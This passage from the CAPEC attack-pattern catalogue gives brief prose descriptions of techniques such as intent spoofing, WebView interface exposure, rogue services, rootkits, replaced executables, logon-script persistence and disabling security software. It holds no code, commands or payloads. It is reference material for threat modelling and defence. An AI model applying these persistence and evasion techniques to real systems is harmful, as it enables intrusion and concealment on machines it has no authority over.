An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.

CAPEC-502: Intent Spoof

An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.

CAPEC-503: WebView Exposure

An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.

CAPEC-536: Data Injected During Configuration

An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.

CAPEC-546: Incomplete Data Deletion in a Multi-Tenant Environment

An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.

CAPEC-550: Install New Service

When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.

CAPEC-551: Modify Existing Service

When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.

CAPEC-552: Install Rootkit

An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.

CAPEC-556: Replace File Extension Handlers

When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.

CAPEC-558: Replace Trusted Executable

An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.

CAPEC-562: Modify Shared File

An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.

CAPEC-563: Add Malicious File to Shared Webroot

An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.

CAPEC-564: Run Software at Logon

Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.

CAPEC-578: Disable Security Software

An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.